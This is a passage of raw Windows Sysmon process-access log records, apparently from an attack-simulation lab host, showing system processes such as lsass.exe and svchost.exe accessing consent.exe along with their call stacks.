RT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.739{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.739{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.717{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.717{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.702{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.702{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.655{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.655{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.655{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.617{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.617{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.617{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.455{466BC892-02AF-60E8-1300-00000000CF01}9761504C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.439{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37074066BF5FDC3F19D39220E5AE1B83,SHA256=AAB1D1D35A17F05D303DB44E427AF6C60B4DFC8CAAC501A9DE4F392F8B4D9676,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.371{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.371{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.371{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.371{466BC892-F4E3-60EB-407D-00000000CF01}99727980C:\Windows\System32\consent.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x70C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\consent.exe+1452|C:\Windows\System32\consent.exe+3ca7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.355{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.355{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.339{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.338{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.336{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\